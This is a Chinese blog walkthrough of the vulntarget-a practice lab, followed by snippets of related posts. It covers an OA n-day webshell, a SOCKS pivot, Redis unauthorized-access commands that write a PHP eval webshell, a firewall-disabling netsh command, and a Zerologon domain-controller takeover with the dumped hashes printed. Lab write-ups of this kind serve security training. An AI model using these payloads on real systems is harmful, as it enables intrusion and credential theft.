vultarget-a靶场渗透

最新推荐文章于 2024-06-20 16:24:56 发布
最新推荐文章于 2024-06-20 16:24:56 发布
阅读量403 收藏 2
点赞数
分类专栏: 内网 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53287512/article/details/128491189
版权

vultarget-a靶场渗透

1.信息收集

web服务器地址为http://192.168.14.137/,很明显该网站属于通达oa

image-20221229093610752

2.通达oa-nday getshell

扫描通达oa历史漏洞,成功getshell

image-20221229094617918

蚁剑连接shell,system权限

image-20221229094746925

3.上线CS

本地生成exe上传至服务器,运行成功上线

image-20221230094557956

4.内网信息收集

可以发现此win7主机存在双网卡,192.168.14.0为外网环境,10.0.20.0为内网环境

image-20221229095553471

5.存活主机探测

对10.0.20.0网段探测存活主机,发现主机10.0.20.99

image-20221229100258325

6.socks代理

建立socks代理,使流量转发至kali

image-20221230094628965

7.端口扫描

发现其存在redis服务和web服务

image-20221229104137680

image-20221229101519046

8.web服务敏感信息泄露

对80端口进行目录扫描,发现phpinfo页面

image-20221229103741124

image-20221229104029244

9.redis未授权访问

尝试redis未授权访问,成功连接

image-20221229101954700

使用redis写shell,网站绝对路径可在phpinfo界面中获取

CONFIG SET dir  "C:/phpStudy/PHPTutorial/WWW/"
CONFIG SET dbfilename shell.php
set 1 "<?php @eval($_POST['a']);?>"
save

image-20221229104624630

使用蚁剑连接shell

image-20221229104908672

10.上线CS

先关闭防火墙

netsh advfirewall set allprofiles state off

正向shell上线CS

image-20221230094710893

10.域内信息收集

发现win2016处于域内,域控为win2019

image-20221229110151210

image-20221229110339773

ping一下获取域控ip为10.0.10.110

image-20221229110359744

11.CVE-2020-1472利用

CVE-2020-1472影响win server2008r到win2019多个操作系统版本,只需要得到域控的用户名且能够访问到目标域控,漏洞不需要主机在域环境下,原理是通过将目标域控密码置空,根据获取的凭得到域管理员的权限。

先挂一个sock4代理

image-20221230094741362

利用用cve-2020-1472漏洞将域控密码置空

image-20221229124332523

使用secretsdump.py尝试获取administrator域控的hash值,此文件在impacket/examples目录下

image-20221229124300300

成功获取hash

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

使用smbexec.py拿域控shell,成功横向移动

image-20221229124537990

导出 sam system 等文件到本地,获取域控机器上本地保存之前的 hash 值用于恢复:

image-20221229131300438

$MACHINE.ACC:

$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:bbdf31f778d5f163ea3df27c8d8aa28e

恢复域控hash

image-20221229134000540

image-20221229134332358

Christ1na
关注
专栏目录
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6158
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
vultarget-a红日靶场全面解析(完整版)
热门推荐
问彡心的博客
11-02 1万+
这是一次完全的渗透过程,从对外开放的主机开放的通达OA系统漏洞和永恒之蓝漏洞进入第一层主机,并利用其作为跳板机,渗透第二层存在有redis未授权访问的漏洞,在根据添加路由和代理的方式成功拿到最高权限的shell,最终攻击到域控,从web渗透,到横向渗透最后到掌握域控,中间出现过很多的问题,比如通道死机,无法连接,木马程序停止在目标机运行等状况
vulntarget-a靶场
shajianlong666的博客
06-29 232
vulntarget-a
Vulntarget-a靶场实战记录
weixin_50398751的博客
06-14 1401
网络结构:域控、内网、外网 使用技术:通达OA系统漏洞 、Redis未授权访问漏洞 、ms17-010永恒之蓝 、代理转发内网跳板、 CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动 、msfconsole、cobalt strike
内网渗透--vulntarget-a
m0_66299232的博客
04-04 1065
1.探测到6379端口,这个端口是redis容易造成未授权访问漏洞,可进一步将恶意数据写入内存或者磁盘之中,造成更大的危害。config set dir "C:/phpStudy/PHPTutorial/WWW/" //切换目录。1.由于靶机开放445端口,并且是win7主机,启动msf进行探测、利用。2.用扫描模块探测主机可能存在永恒之蓝漏洞,进行漏洞利用攻击。11.拿到管理员hash,执行提权exp,成功拿下域控!2.成功连接到redis服务,访问成功,不需要密码。
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
打穿内网之Vulntarget-a靶场实战记录
tpaer的博客
11-11 2572
内容包括:通达OA未授权上传+文件包含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递
CISP-PTE靶场(win+centos).zip
03-13
CISP-PTE靶场是一个针对信息安全专业人员进行渗透测试与应急响应能力训练的平台,它涵盖了Windows和Linux两种操作系统环境。这个压缩包包含了两个不同系统的靶场环境:win2003和CentOS,以及一个关于如何搭建CISP-...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
靶场实战】vulntarget-a漏洞靶场实战
最新发布
TT小子的博客
06-20 843
vulntarget-a漏洞靶场是由vulntarget大佬团队自己设计搭建的靶场,其中涵盖Web漏洞、主机漏洞、域漏洞、工控漏洞等等。
vulntarget】系列:vulntarget-a 练习WP
一只爱吃橙子的羊
07-09 794
vulntarget靶场系列,vulntarget-a 练习WP,会持续更新……
巨细巨细的白痴级vulntarget-a靶场wp再不会你打死我
XYpangSJ的博客
06-01 1011
ps:此处 攻击机ip192.168.87.134,win7ip1为192.168.87.144。配完去攻击机上访问win7ip看看能否访问,可以就表示配置完成。使用proxychains4对10.0.20.99进行端口扫描。修改etc/proxychains4.conf。用procychains4代理使用哥斯拉连接。开放了80端口访问一下phpinfo.php。使用redis未授权访问xieshell。点击target,选择add,如下填写。使用socks_proxy做代理。
[vulntarget靶场] vulntarget-a
qq_43884092的博客
09-17 552
永恒之蓝,通达oa后台getshell,redis未授权访问写入webshell,cve-2020-1472
vulntarget-a靶场的学习思考
weixin_48421613的博客
03-21 6642
前言: 最近玩了一下crow大表哥的靶场,觉得靶场打过之后确实是能用到很多技巧和知识,所以在这里做一些个人的学习总结,文章和靶场适合新人,因为不用做免杀,也可以让人初步的了解一下域环境 靶场由星期五实验室与乌鸦安全共同维护,GIthub可自行下载,Github原文链接以及原过程链接如下 https://github.com/crow821/vulntarget. https://mp.weixin.qq.com/s/uxwbnVOxkR8OBkkY9WW6aQ. 靶场下载地址如下 链接: ht
VulnTarget-a
大熊
06-16 641
实验目标:拿下域控桌面学习目标:信息收集/蚁剑webshell管理/CS上线/msf上线/流量代理转发/提权/漏洞利用等。靶机下载:其中vulntarget-a为本次实验机器》》》靶机信息《《《:::info跨网段需要路由转发。
【勒索来袭】vulntarget-n靶场搭建& 打靶流程
crowsec
06-12 1416
vulntarget-n是一个模拟全球化勒索病毒高发环境下的应急响应和取证分析案例,其模拟了一个正常运行的业务服务被勒索病毒攻击的情景
[ 漏洞复现篇 ] 通达 OA11.6 文件上传+RCE 漏洞复现
qq_51577576的博客
04-14 5049
一、漏洞编号 二、漏洞靶场 三、漏洞影响版本 四、FOFA Dork/Google Dork 五、利用漏洞风险 六、漏洞修复方案 七、漏洞利用过程
vedas靶机渗透攻略
weixin_47311099的博客
01-13 796
信息收集 nmap扫描 nmap -sC -sV 192.168.93.0/24 -p- ​ 目标192.168.93.135 开放22ssh 80http 网站信息收集 首页没啥东西 目录爆破也没啥,22端口爆破太费劲… ​ 扫描udp协议 tcp没思路,扫扫udp nmap -sU -sV 192.168.93.135 68dhcp没啥用,161snmp倒是有点意思 ​ ​ ​ msf探测snmp信息 search snmp ​ use 25 发现一个flag,并提示去root的方式 一串
vulntarget漏洞靶场-vulntarget-b
aming小老弟
07-19 3790
vuln靶场
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
在 DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值